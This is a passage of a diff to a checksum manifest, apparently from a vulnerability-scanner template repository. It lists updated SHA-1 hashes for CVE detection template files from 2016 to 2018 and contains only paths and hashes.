http/cves/2016/CVE-2016-1000136.yaml:5ee948fb4f7e2df7f4acf3e1ffdf28e9dfaf5322 -http/cves/2016/CVE-2016-1000137.yaml:7992a62d8b0a760dc2745ea2d4bdcff8a8c63dd7 -http/cves/2016/CVE-2016-1000138.yaml:ef4e7b323056e6d946ca47ef4c1a2e2b727d1ab0 +http/cves/2016/CVE-2016-1000137.yaml:2e2b998b96166d5bcab21989bd157ce566053d0b +http/cves/2016/CVE-2016-1000138.yaml:b3d7023d5fec09ee08535602972a17fff99e7767 http/cves/2016/CVE-2016-1000139.yaml:8b0948303469e93387ad15ba7c7d26ddd0864b29 http/cves/2016/CVE-2016-1000140.yaml:824295a403f50be40c0442f34403855e9a1d472b -http/cves/2016/CVE-2016-1000141.yaml:7dedcea1a8ad3f4b2f71389036404f164c088465 -http/cves/2016/CVE-2016-1000142.yaml:299e7a60c352c0d7ea4f9a6d75d436f15aab1c13 +http/cves/2016/CVE-2016-1000141.yaml:685f6855bd21008a3b9a651a785a986d1e4226a9 +http/cves/2016/CVE-2016-1000142.yaml:b8a04a9d4af50f122b340fdfed9235b0186960df http/cves/2016/CVE-2016-1000143.yaml:27bb71d021209094b538c07f4f52733dbc941fbd http/cves/2016/CVE-2016-1000146.yaml:0f4feb40b92ac6e9e336bc76a07d46ff7071f845 -http/cves/2016/CVE-2016-1000148.yaml:25ba12031468a02dba3afd1911f23c94572dc39e -http/cves/2016/CVE-2016-1000149.yaml:86bc42b8ccb0e878805966b9cbe4a0d876d7f77b +http/cves/2016/CVE-2016-1000148.yaml:b2a8951e2d3e0eb40a2e5cceb0ad8f3693231a47 +http/cves/2016/CVE-2016-1000149.yaml:b823989eee6c8387d73e2612cd6c66d34822f8d9 http/cves/2016/CVE-2016-1000152.yaml:d94328828fbf18aba5ef94afb0bd4df113377769 http/cves/2016/CVE-2016-1000153.yaml:918980710b38127ac9e1da9cdeb7424b9ee7b74f -http/cves/2016/CVE-2016-1000154.yaml:7a051fc4ae2373f86ad53f6abdda4d7096fdf62e -http/cves/2016/CVE-2016-1000155.yaml:647dfeeec99b332ef140771291662d1cbe99286a -http/cves/2016/CVE-2016-10033.yaml:232d83356ff34a267485bcb25a7dbf545fce3e88 -http/cves/2016/CVE-2016-10108.yaml:fec37410b6b632419f59b6c386bf2ad37db2282c -http/cves/2016/CVE-2016-10134.yaml:cb89300fac923d957bf6f61202f8fdc1159d643a -http/cves/2016/CVE-2016-10367.yaml:7e0f439a28a7d9e0294a6752135175a00d4df520 -http/cves/2016/CVE-2016-10368.yaml:f7e31f13e4b1e7d3e9e714d3333462629b0a0e35 -http/cves/2016/CVE-2016-10924.yaml:f0f8949f73e892e9f269db834c2b6872c15f5a07 +http/cves/2016/CVE-2016-1000154.yaml:9f5e685ba1c82c03aa4ed980453f43ac1cb764a0 +http/cves/2016/CVE-2016-1000155.yaml:66e029ab0a6d4162a214f753b05749ac684570b3 +http/cves/2016/CVE-2016-10033.yaml:46d3745bada72633018639374e9274917e64c42c +http/cves/2016/CVE-2016-10108.yaml:d294a26723fb6dd081c30acc03ecfdfe3ebaeace +http/cves/2016/CVE-2016-10134.yaml:cd8be7b6b0f67be8cb711fac99045e3498296317 +http/cves/2016/CVE-2016-10367.yaml:f88f3b6e7d95ec3ef277bdb9602bf4d1f1c056ab +http/cves/2016/CVE-2016-10368.yaml:18a03211359f0c24af9c4b6160d1c0ef2b2215d4 +http/cves/2016/CVE-2016-10924.yaml:09bb7f7b66f894172c675bb3d36ef59589aa88c1 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f -http/cves/2016/CVE-2016-10956.yaml:3c167a0e9cca4b786fda517c6bc7668cee4141db +http/cves/2016/CVE-2016-10956.yaml:6fd083b2e80dd090fececf6794043d2a136eaadd http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 -http/cves/2016/CVE-2016-10973.yaml:436451c68c9ddcd9b94a26278477ae2c41a1d880 -http/cves/2016/CVE-2016-10993.yaml:9bdd195c57b0946d4ed5c3df87dfd5837de8a22c -http/cves/2016/CVE-2016-1555.yaml:6b3e893a1320115b0e18d785105a0f7d5775d683 -http/cves/2016/CVE-2016-2389.yaml:928ce62f5f7913e63131cdb7484fc7b35ab40f9e -http/cves/2016/CVE-2016-3081.yaml:1085462cce049c99ca76f547b4599989a14efc98 -http/cves/2016/CVE-2016-3088.yaml:f91d8ac41e4432028cfbede6964661454e2331ff -http/cves/2016/CVE-2016-3978.yaml:b59e9ed3e4c91df88b86bb456095ec9ed543d290 +http/cves/2016/CVE-2016-10973.yaml:5607fa845f3c04fce8d349a6bce10be3bc9fd814 +http/cves/2016/CVE-2016-10993.yaml:7c95f86a87dba06de19b0c7c9974dacb82e09dee +http/cves/2016/CVE-2016-1555.yaml:43cc763cb62fa934d7686f2ae4177a663ce52599 +http/cves/2016/CVE-2016-2389.yaml:e68d84e200ee7ff552bde70a22a6ee13d2b7e3ff +http/cves/2016/CVE-2016-3081.yaml:325162185e24455dad06d62debd2587b4a1ef985 +http/cves/2016/CVE-2016-3088.yaml:10f622b6bcf9495bdbdfb8ad8094212ca42ade19 +http/cves/2016/CVE-2016-3978.yaml:50194a7bb856d34897330f6abfb36130e4d3296f http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:98681241e1d9f4db62b42820bba949ed2f152e2b +http/cves/2016/CVE-2016-4975.yaml:628966f69a92b4056fdaf6c7fce5828958631dd5 http/cves/2016/CVE-2016-4977.yaml:ee48ddeac3b6d5461bc8980481e880af947436db http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:05184cce04ffa241bc304b0f242daaec7107280a -http/cves/2016/CVE-2016-6195.yaml:108d4b0cb54ea491a3c8e177bc56a13f8162dfbb +http/cves/2016/CVE-2016-5674.yaml:d0634ea9f19d47d72147befa933456f64520f566 +http/cves/2016/CVE-2016-6195.yaml:77519659bb0d9bbe21181153fe3dbb89ad7d99f9 http/cves/2016/CVE-2016-6277.yaml:c93b89da0c42f6e280440504cb3dd67c981a8d17 http/cves/2016/CVE-2016-6601.yaml:afa3f46e2bae4d3e90c1f403147d3e8a5b7d5739 -http/cves/2016/CVE-2016-7552.yaml:b8c439538226b5eca13f4e80bf74f0ac0cd45749 +http/cves/2016/CVE-2016-7552.yaml:39fc5904a9dca99e15f19f2436b6b431b73c0446 http/cves/2016/CVE-2016-7834.yaml:11e35334c12e72dab14682a71d851436eb898e8e -http/cves/2016/CVE-2016-7981.yaml:948a6727c2a8d4385c276e5d1e567cf6938371cd -http/cves/2016/CVE-2016-8527.yaml:de4d4d55ae233f9d0cc2cccf2527eaa43f2404fe -http/cves/2017/CVE-2017-0929.yaml:689211627cec05f38e3139c3f39271bd9542eb43 -http/cves/2017/CVE-2017-1000028.yaml:80cbf906dcacf0ba374dcacaec27b5e8b36e01df -http/cves/2017/CVE-2017-1000029.yaml:876ec94e59e9130cb5d34ff5c4a1e620251c37b0 +http/cves/2016/CVE-2016-7981.yaml:a2e0b9e42c515b9502621de3a809739bdb990538 +http/cves/2016/CVE-2016-8527.yaml:0dc95f94bd9750d11ae4886a5e0c6b15d70b065e +http/cves/2017/CVE-2017-0929.yaml:0d7a93b1f9d88b35c44d9f9ca56eccc62f865358 +http/cves/2017/CVE-2017-1000028.yaml:2ff0a301c6342c6a2c19b297accdecc6d48d8b78 +http/cves/2017/CVE-2017-1000029.yaml:a846ff1d51506f78c2b94e8a563c997d15532a7a http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa -http/cves/2017/CVE-2017-10075.yaml:4bfbacc8e70549ff7a5b7f9e8ab3cca9f0f0948d -http/cves/2017/CVE-2017-10271.yaml:9b29a0d9242daab5c40fe8271718a8de9207e06e +http/cves/2017/CVE-2017-10075.yaml:ea4df8e06524ec92943b5b1d10920d92f190aa72 +http/cves/2017/CVE-2017-10271.yaml:c4d6d49ab294a59ba606325b0acabdc7be08bbae http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:335f7c179dccc3c2ea100da30d83ef0a2fca00d6 -http/cves/2017/CVE-2017-11444.yaml:a388e3b68002ab31cb33b61d088534f8d1b273a4 -http/cves/2017/CVE-2017-11512.yaml:551d25f72869af07044971e06d7c9aef09a9eeae +http/cves/2017/CVE-2017-11165.yaml:4abee409b33591001d45b096b6831499a91d3bcb +http/cves/2017/CVE-2017-11444.yaml:e1fedcc6cdc98248426ca0fb2352f1cd3861e2a9 +http/cves/2017/CVE-2017-11512.yaml:1cfc04d6428e8e76fbb3feb437ebde04e509a684 http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:ad211be750982c1ef4165048da870fb2e789c67b +http/cves/2017/CVE-2017-11610.yaml:eba5c87798e309ab7c2ed89224a3a97f1c95df53 http/cves/2017/CVE-2017-11629.yaml:fc84633073745770603d19a552733beea2ac9779 -http/cves/2017/CVE-2017-12138.yaml:676cfe5f8f65f4ed3f4cf5846ba3b05c28e13e41 -http/cves/2017/CVE-2017-12149.yaml:5cfca7ee5636a93632aeb615f1d427aee75013cd +http/cves/2017/CVE-2017-12138.yaml:a1554be248c76a1249afeb83ac82a58f34e20390 +http/cves/2017/CVE-2017-12149.yaml:8e2fbc198b479812329b84de8a428699bcd1d2d8 http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c -http/cves/2017/CVE-2017-12544.yaml:c4eae0c6efa6c3fc9ded84cc1e4624951ba966f9 -http/cves/2017/CVE-2017-12583.yaml:4b305b31b1330fdb1c24ec5787f57c060a42c11c -http/cves/2017/CVE-2017-12611.yaml:72658b1e16883bf8fe5ab1b8a0357e7c1518df56 -http/cves/2017/CVE-2017-12615.yaml:c912d36a03fb120bd0925b58561dbae629d345b5 -http/cves/2017/CVE-2017-12617.yaml:d92e32ab1c635908b9f63c99eedbc85476df017b -http/cves/2017/CVE-2017-12629.yaml:1b9b31ff6170297ba3b4f6fce3f0fd545c3f0a5d -http/cves/2017/CVE-2017-12635.yaml:db4eebc97e2ae1fa1558cdde2bf1123b319959c1 -http/cves/2017/CVE-2017-12637.yaml:f6a1b763290d992add7cf068d6051031c21f47b1 -http/cves/2017/CVE-2017-12794.yaml:4fe35ab1aaf9361761a37580d0c94f1bb8962c29 -http/cves/2017/CVE-2017-14135.yaml:fd02174fcd39ebd97a8ac4f34b6318d407d31e96 -http/cves/2017/CVE-2017-14186.yaml:e696378be2d403a776827e81a021a037942ef508 -http/cves/2017/CVE-2017-14524.yaml:eb53f561b7702df075913dd2c473245064faf3c0 -http/cves/2017/CVE-2017-14535.yaml:d6d786c498806e7d3fece3f2b9f853bdab962254 +http/cves/2017/CVE-2017-12544.yaml:07292848eebcdfadb01f7e946fb853685a612de5 +http/cves/2017/CVE-2017-12583.yaml:b819605bd22e17173142db5497ef7649bb5f83eb +http/cves/2017/CVE-2017-12611.yaml:1993c3d7c28326bc0c5701c84dcdbbe8777de6be +http/cves/2017/CVE-2017-12615.yaml:40f7f4d617668238e645d70888cab907c4bb687d +http/cves/2017/CVE-2017-12617.yaml:da64d230dee94b884c7e8384e9ebf7bfedc9c424 +http/cves/2017/CVE-2017-12629.yaml:c257f7eeaf409d969825d8298387c2300ed7adf4 +http/cves/2017/CVE-2017-12635.yaml:89903a430387c5ce7c178df83444800fc326c22c +http/cves/2017/CVE-2017-12637.yaml:1b6bd16d62ac6f72abebffaa4f9f9dc32e52cb3b +http/cves/2017/CVE-2017-12794.yaml:c56afff76e73c7654ea22b8a35d2b410d92bccc6 +http/cves/2017/CVE-2017-14135.yaml:510f2f619a872f6a885dda7291a4d923ff185753 +http/cves/2017/CVE-2017-14186.yaml:8b9c2e8b1df76fe3d4d39ebc0d9cb11c669ddb62 +http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b +http/cves/2017/CVE-2017-14535.yaml:36184e53e63918cccb1dc69c16eb38358180f971 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 -http/cves/2017/CVE-2017-14622.yaml:eb5b0b5643d963dc7d8d48e3eb928ba7c46c31a4 -http/cves/2017/CVE-2017-14651.yaml:3bbb9436f3323be25dcb01b3b5157828bfcacfdc -http/cves/2017/CVE-2017-14849.yaml:b0590b97b7773681e21e4286050705c3003a1305 +http/cves/2017/CVE-2017-14622.yaml:5ffbed6d0ec83209380bb7e610c118f762b182df +http/cves/2017/CVE-2017-14651.yaml:e8adee45b732510acc3690917813717fb892a10b +http/cves/2017/CVE-2017-14849.yaml:853c08fbe5c5e6c85de61301449553acbad6f05b http/cves/2017/CVE-2017-15287.yaml:6000296cdf09698cffa12c51e003822697406662 http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:27f869507d13b8dedc776c4fb9c4063c8dd73c3d -http/cves/2017/CVE-2017-15944.yaml:0dbecebb30affc23bec8b2a1193ffc5cb92ed3b3 -http/cves/2017/CVE-2017-16806.yaml:01a0fb38f29898ae3ee66414fd284d286c8af403 -http/cves/2017/CVE-2017-16877.yaml:a5759ca704cd8d23987d433fa76c18a18424220a +http/cves/2017/CVE-2017-15715.yaml:8ebe5ef421beb30836ce4b73a7ced652174e7d7c +http/cves/2017/CVE-2017-15944.yaml:8bc2112905b54238725ec0d269e8b1f2d539cd89 +http/cves/2017/CVE-2017-16806.yaml:5a788972a7ebb5bfdda60837c9543ff996c9e9fb +http/cves/2017/CVE-2017-16877.yaml:647f32ff1ece73be040cec73060694e9cccbf8e4 http/cves/2017/CVE-2017-16894.yaml:cc779a98a64aa8bbeb1694c3f0922a45974063b6 -http/cves/2017/CVE-2017-17043.yaml:d66d885d7578369ae2b82e2e985e722e324dddd9 -http/cves/2017/CVE-2017-17059.yaml:423a292f21591120f88595e2138cab3dc318a902 -http/cves/2017/CVE-2017-17451.yaml:cfdd77524c14ea2d409baea560ea2f0853e6b8a8 -http/cves/2017/CVE-2017-17562.yaml:9547b1a2aad01541a5002fdfe7bc5e9e477e9963 +http/cves/2017/CVE-2017-17043.yaml:1faa4df6f6577cfe32bb09c58fe66b2ef754cba4 +http/cves/2017/CVE-2017-17059.yaml:c892ab75bb1834584b10c435e8ea434a3c8012d6 +http/cves/2017/CVE-2017-17451.yaml:1a8fa69ee3d82c0ac12ad13584c8fb0af61d4957 +http/cves/2017/CVE-2017-17562.yaml:3150e287ce0f8e4f5529a0103844e02be65a5f80 http/cves/2017/CVE-2017-17731.yaml:3f51a3a99f2e8b5bfd36c145bbabaea0607acd75 -http/cves/2017/CVE-2017-17736.yaml:70a8d778dc0695ca6f3e7875e8ca29aabe8eefbc -http/cves/2017/CVE-2017-18024.yaml:7ad02d50552197493d2329d6750671539f097603 -http/cves/2017/CVE-2017-18487.yaml:18c6da8e5ed2e735a102165398d971d35cd96fcb -http/cves/2017/CVE-2017-18490.yaml:aba5f23b2aef25445c641328a6ddc3e987bc8f0e -http/cves/2017/CVE-2017-18491.yaml:87c9b463bdfa96302ff4018e7e55df14a8892a8a -http/cves/2017/CVE-2017-18492.yaml:cf11958620dcfe04715b3e510fec476d0ac23af5 -http/cves/2017/CVE-2017-18493.yaml:6e99015904657d7324ee061d06a4f38938fe5e64 -http/cves/2017/CVE-2017-18494.yaml:a1a215937628bac45037637e3b56de380fe1fc5b -http/cves/2017/CVE-2017-18496.yaml:c918d0780a51c89081a65e495fed915d32c6d989 -http/cves/2017/CVE-2017-18500.yaml:328b89f371566ab0c7cc4ad131bb840605d3a110 -http/cves/2017/CVE-2017-18501.yaml:1963e8addb6e82ca38b406b512a15a4aaad84a09 -http/cves/2017/CVE-2017-18502.yaml:1ab4e124d406d2430332fc28bfb1451170ebd51e -http/cves/2017/CVE-2017-18505.yaml:a1b07dc2eb977736183e951ed2f7dacb8fdc9638 -http/cves/2017/CVE-2017-18516.yaml:cf6a0a1c40c0bfd362bfc15605689f155be88305 -http/cves/2017/CVE-2017-18517.yaml:c7144d2eb0744b8ec32b547c3e2f42de76396ad2 -http/cves/2017/CVE-2017-18518.yaml:b993c19050e2224a427f62975d0428f1e1a93909 -http/cves/2017/CVE-2017-18527.yaml:4381542ae3dda5483088fe923f8c4ccddc4110e0 -http/cves/2017/CVE-2017-18528.yaml:d3c1ed61c27edf32241fe9dbea66b001054f184a -http/cves/2017/CVE-2017-18529.yaml:815c2dac5e98cc90c59c0f44ab02ce6f4af2a698 -http/cves/2017/CVE-2017-18530.yaml:b948f523f2a8f4a2d4ff22f216a6da7a7c14cb5a -http/cves/2017/CVE-2017-18532.yaml:527911bf8931c9cc9a89c6dd47f72e1e917e8d01 -http/cves/2017/CVE-2017-18536.yaml:be20e319ddf44c48e682606863c8bb669169b73b -http/cves/2017/CVE-2017-18537.yaml:323652d96c20ca84bbf364b0c39c489c879a2be9 -http/cves/2017/CVE-2017-18542.yaml:4860bdedb8eef5f2f25a6eb543757f6e081e528b -http/cves/2017/CVE-2017-18556.yaml:0e9aa4dd05abcaa53bd8659715d53e8127a82230 -http/cves/2017/CVE-2017-18557.yaml:8836164173657270b90495bcc3b07b50b3416949 -http/cves/2017/CVE-2017-18558.yaml:9c20a4c29e4af9f616d1cb76b7d71a990bddeff1 -http/cves/2017/CVE-2017-18562.yaml:2b0e335f62ace14516ca1d2b53eabb5e91fb4c4c -http/cves/2017/CVE-2017-18564.yaml:12c5ce5624db3a6ba010aa3ea9ba7c55d53f5ecc -http/cves/2017/CVE-2017-18565.yaml:68a894157caff6326df9bfef799d7d19647ff97d -http/cves/2017/CVE-2017-18566.yaml:28e689c2192d98d78215ef0d9178cd61645644b5 -http/cves/2017/CVE-2017-18598.yaml:741d867d16cacf520035fa44376841fdd2a4181a -http/cves/2017/CVE-2017-18638.yaml:9c3a2bf93f02877b319955bf5112b033815fb876 -http/cves/2017/CVE-2017-3506.yaml:837bfce7c2c79bb9b7598e4c594e44cd0dceec41 -http/cves/2017/CVE-2017-3528.yaml:33a1816704db08e4d524156a6a9c2dd3abd6df92 -http/cves/2017/CVE-2017-4011.yaml:9148db4589b153f37f6a0b1b357f4415564c1ff6 +http/cves/2017/CVE-2017-17736.yaml:fd899ec80278ce3631ef111ab0c616233f1ee315 +http/cves/2017/CVE-2017-18024.yaml:9e42c545d599b03b2602a86a13618441d34bfafb +http/cves/2017/CVE-2017-18487.yaml:f0a246a0a5ef0f05410c7c8537c5610488be7027 +http/cves/2017/CVE-2017-18490.yaml:48455ec9d00dd27c817580bbc9a5e17b6059dccd +http/cves/2017/CVE-2017-18491.yaml:28b658ab3b50b4f490831748f02f282303c7f8ae +http/cves/2017/CVE-2017-18492.yaml:d440d75aee24dc6de7941c745ede9c3470ac1b7f +http/cves/2017/CVE-2017-18493.yaml:c8094504b97edaf846cf1b8f411bb8b2aa1bc23d +http/cves/2017/CVE-2017-18494.yaml:37b04d4b0b9b8bde5573d553447e3e7e341935bb +http/cves/2017/CVE-2017-18496.yaml:1eb967d74ce4d6c33a7d5664fc57e55b29f01186 +http/cves/2017/CVE-2017-18500.yaml:0498aaedc7a59f2c4a1a116dd08ba5f8299de179 +http/cves/2017/CVE-2017-18501.yaml:dab2bb19389acd57d2bd23c9e05f90a2f6341ba6 +http/cves/2017/CVE-2017-18502.yaml:b7b41b4518955c572ff520630bae770a7eab3f96 +http/cves/2017/CVE-2017-18505.yaml:a85b34e55bc6224da1b5952a0ee2a52a99b002b7 +http/cves/2017/CVE-2017-18516.yaml:e10b94be4f71de28574f89312512a969622697ca +http/cves/2017/CVE-2017-18517.yaml:2b5fa1cdd9f2d67e28c275c47cec55af53aa3a94 +http/cves/2017/CVE-2017-18518.yaml:3250e688c4596ee53917d84886bd4a19aed22186 +http/cves/2017/CVE-2017-18527.yaml:778fd4e2ce01c2ac584d34578b4e24a5e11d3966 +http/cves/2017/CVE-2017-18528.yaml:b9f628099df7e0be59b9971727d96ecd8ca7db2c +http/cves/2017/CVE-2017-18529.yaml:b85d0dea7b4251f6f9693aa93cca7d0c6a5e5241 +http/cves/2017/CVE-2017-18530.yaml:c1f6b8f720f547e347c0dc0ba30eb7070e9c9fc5 +http/cves/2017/CVE-2017-18532.yaml:f2250ec678ac6553cd407e7fca7b89d59e6ce9d4 +http/cves/2017/CVE-2017-18536.yaml:41a5883c94c1941dbb3026c74c998dc04d1a601e +http/cves/2017/CVE-2017-18537.yaml:d4dc7eeadee533323c5f3877409ffbdd4929e204 +http/cves/2017/CVE-2017-18542.yaml:4b64131d7f9ec2c0c3159255254158f7228abc49 +http/cves/2017/CVE-2017-18556.yaml:1fe561c24092fbf003ac72967fd8a3084065812b +http/cves/2017/CVE-2017-18557.yaml:d701507eec81973f152631361febf59ec56d1a6b +http/cves/2017/CVE-2017-18558.yaml:b7230400233b64080754dd6e80658b0852231b4d +http/cves/2017/CVE-2017-18562.yaml:afd3097c8776a794b43b5a52d88a664425764f36 +http/cves/2017/CVE-2017-18564.yaml:74ab76cdcf46659cca6c1ea77cb9213ba01e51c2 +http/cves/2017/CVE-2017-18565.yaml:d64b8f0a6479f9868d0909ca3dd47aba11df865a +http/cves/2017/CVE-2017-18566.yaml:54fd16f9c7f113b4722d0ab7f08cc01e5ab0a00b +http/cves/2017/CVE-2017-18598.yaml:719fce236cacd3acd5ff5821908da70fff098592 +http/cves/2017/CVE-2017-18638.yaml:5e91379f58e5c4cda0e0863aadc67c71a96d6559 +http/cves/2017/CVE-2017-3506.yaml:12b9bc3a81b1c55c622b03b41e274bb582208b19 +http/cves/2017/CVE-2017-3528.yaml:ec01ac21133968ed4d05e0535b7badae0939dc19 +http/cves/2017/CVE-2017-4011.yaml:f8387b349e05c712d5e9c5ccfeaf56a80317c75a http/cves/2017/CVE-2017-5521.yaml:441d7bb12801dc564993e7673c6c9c31ab43f79c -http/cves/2017/CVE-2017-5631.yaml:1f75e71390098a2b178d30761f6527297ecce195 -http/cves/2017/CVE-2017-5638.yaml:f20f009e50a91ed6246b1ad844e8e0271cc31587 -http/cves/2017/CVE-2017-5689.yaml:3d378636d73676ad81608d04a18ae472cfb7f122 +http/cves/2017/CVE-2017-5631.yaml:64149ea9528e6a81bcde94ef088db0d5f13b7c2d +http/cves/2017/CVE-2017-5638.yaml:cd89c603ba617db8c5a9471832b727471ce1ae6c +http/cves/2017/CVE-2017-5689.yaml:1be0f56b52c9b826d89b2bd7cf1ad720e7184961 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:d2183a769b5e19fad263ff1676513f9e07acfa87 -http/cves/2017/CVE-2017-7269.yaml:05bdd55c99449dc10ce011f6cf0af28e32fdf894 -http/cves/2017/CVE-2017-7391.yaml:4646b749c40f4cc3537b3209b2b12dfdc5815f5c -http/cves/2017/CVE-2017-7615.yaml:0170f8be9ad3a523febbf30981796d08e3acb2b0 -http/cves/2017/CVE-2017-7855.yaml:fba622d2ce8474a21e56e12b00bdf6272866cf9e -http/cves/2017/CVE-2017-7921.yaml:288e08111c5be77443c8a2f8fe38664718bd35d8 -http/cves/2017/CVE-2017-7925.yaml:df55d9a466ec0d118376375b8d24822dc201aae4 +http/cves/2017/CVE-2017-6090.yaml:8a13b4efc5f9804693c2683423421735b2de3667 +http/cves/2017/CVE-2017-7269.yaml:f16a7101c1403bd7557b170c713670c640a55c52 +http/cves/2017/CVE-2017-7391.yaml:db61bf2e66f06a7be89057d22daa11bdbfcb1d72 +http/cves/2017/CVE-2017-7615.yaml:82207da904d8e6f360a196d837d2a064b563fefb +http/cves/2017/CVE-2017-7855.yaml:033912cd7c7c8811ce7df75b334efcfed008d425 +http/cves/2017/CVE-2017-7921.yaml:b64dd053472ec2eb04035ea846e3beeb6db8674c +http/cves/2017/CVE-2017-7925.yaml:6924f88514cb1e461f2fd1ea7f5baa463576afbb http/cves/2017/CVE-2017-8229.yaml:5904f7e455bf3a8b4fdc772fb95abc1429f1ab66 -http/cves/2017/CVE-2017-8917.yaml:18eb560c3ae4a68bfb37e8e314b93ca835523ccc -http/cves/2017/CVE-2017-9140.yaml:185afc688b01aaa345e8891bfb89303663d71e13 +http/cves/2017/CVE-2017-8917.yaml:b988125caf0c36d19d3e519d9935d5cf1bb8851e +http/cves/2017/CVE-2017-9140.yaml:20a875398f9abd82dd93831499d71542c3a4306b http/cves/2017/CVE-2017-9288.yaml:f8dedeb9681681df484b827a5b6202feb453f565 -http/cves/2017/CVE-2017-9416.yaml:db3a9e47909c6f2171b1e6ace465413df850e426 -http/cves/2017/CVE-2017-9506.yaml:6d296062b2c0a14857813ac8db198c208fc16c12 -http/cves/2017/CVE-2017-9791.yaml:14d06a00a2028cd5e48c65d7cbb5cd3a51399910 -http/cves/2017/CVE-2017-9805.yaml:81c3794f70f5ec9e768e11d5db0fa414b0732043 -http/cves/2017/CVE-2017-9822.yaml:c75acad11d35633968cb7f334420707edb941c1a -http/cves/2017/CVE-2017-9833.yaml:9aba0bb0c7751c252e7bf7ea5fd2e7ee78ddb555 +http/cves/2017/CVE-2017-9416.yaml:f8529409df5526dc064d44d038e7587240188912 +http/cves/2017/CVE-2017-9506.yaml:680ead22bf5a92cfe1a6a558a18d00bd2bf4f81a +http/cves/2017/CVE-2017-9791.yaml:5687baa275538df48a4ba17fcd6482a5ec914276 +http/cves/2017/CVE-2017-9805.yaml:3641fe41a685af3dc8e80a4b6152209af80d65a2 +http/cves/2017/CVE-2017-9822.yaml:b7cd7ac9df9f7255d7623587b44929abbfe234ad +http/cves/2017/CVE-2017-9833.yaml:9d5d145ac854cc5f768170b710d4fb541eb2d6df http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:0f92834c92edc1e4e6fb9f1c0de00ede97dc410f +http/cves/2018/CVE-2018-0127.yaml:9039cbd429767ba7737efdc2496732175ed41e85 http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c -http/cves/2018/CVE-2018-1000129.yaml:61c2fdfd04f6c32faad5ebd2e7aa4d4c324a59ee -http/cves/2018/CVE-2018-1000130.yaml:f438d5219e7182e5013ca0f3fb3cd42011642ae9 -http/cves/2018/CVE-2018-1000226.yaml:441edaab2341a22ae577dbd23ae9468d5a73ffa4 -http/cves/2018/CVE-2018-1000533.yaml:948a6a9de7072936bbca5c7d7388c91ef52bc4d3 +http/cves/2018/CVE-2018-1000129.yaml:7997bbbbf18a5581821e4a53d8efcd0681b6fda5 +http/cves/2018/CVE-2018-1000130.yaml:3919e5d1cc90c92b31671f67da4aaa0b9d15cae9 +http/cves/2018/CVE-2018-1000226.yaml:592bafff575e1244e6e273d44450343ae45bbaf6 +http/cves/2018/CVE-2018-1000533.yaml:b92b15bce22e0a205905d8eb8422d3156f08a00e http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:8d16d19b0cc9c32fb10b68f382e9da526e243533 -http/cves/2018/CVE-2018-1000856.yaml:1bd6db921f03613d4e0f5f1b74341cb229675d76 -http/cves/2018/CVE-2018-1000861.yaml:19d67582d28f6a4ab97c800961d4b69d1c13c958 +http/cves/2018/CVE-2018-1000671.yaml:8bf68889af5f3b1d98e20d8f9360522d4b641632 +http/cves/2018/CVE-2018-1000856.yaml:2aebd84fe344186cc05409d5953ee81536be3052 +http/cves/2018/CVE-2018-1000861.yaml:fa2f03128f84ff07428793f51a354d890d7eab02 http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af http/cves/2018/CVE-2018-10095.yaml:b575dc701664434c37703e8ecd03ad7b09e924d8 -http/cves/2018/CVE-2018-10141.yaml:660c2a25c83aafda43e6bce0992cc916a0108db7 +http/cves/2018/CVE-2018-10141.yaml:91f177c2d445f0ce201654d12ef844433cabff9b http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:605cf859fd96ff7e9df95aa31ea7037f31f4534c -http/cves/2018/CVE-2018-10562.yaml:0f2de60fa8395472e584d1731c0e94482f070ff2 -http/cves/2018/CVE-2018-10735.yaml:7ae8a70c70fc84d480e2a84dd90da750053a6252 -http/cves/2018/CVE-2018-10736.yaml:4539e3b3bc9c95fec713e4473dcd9706839a84fb -http/cves/2018/CVE-2018-10737.yaml:60b40993477e1edd14ed412903f9fad6a97ff5d0 -http/cves/2018/CVE-2018-10738.yaml:b6927d277dea39fb3a3af753bea42b23d769f34a +http/cves/2018/CVE-2018-10230.yaml:eee748e919425ece39ce03c57745d4af3a7c2d81 +http/cves/2018/CVE-2018-10562.yaml:990e4f11aa8b166e606a477f9913e2da7921179f +http/cves/2018/CVE-2018-10735.yaml:b005790374cbe4515b8e3b8a1a6ec017f2e7a949 +http/cves/2018/CVE-2018-10736.yaml:a0240c5691781a413d3e6c0cd04be99f0b29fb42 +http/cves/2018/CVE-2018-10737.yaml:71987c9f6bea240300b20e7c0d42fbb6abcdee7b 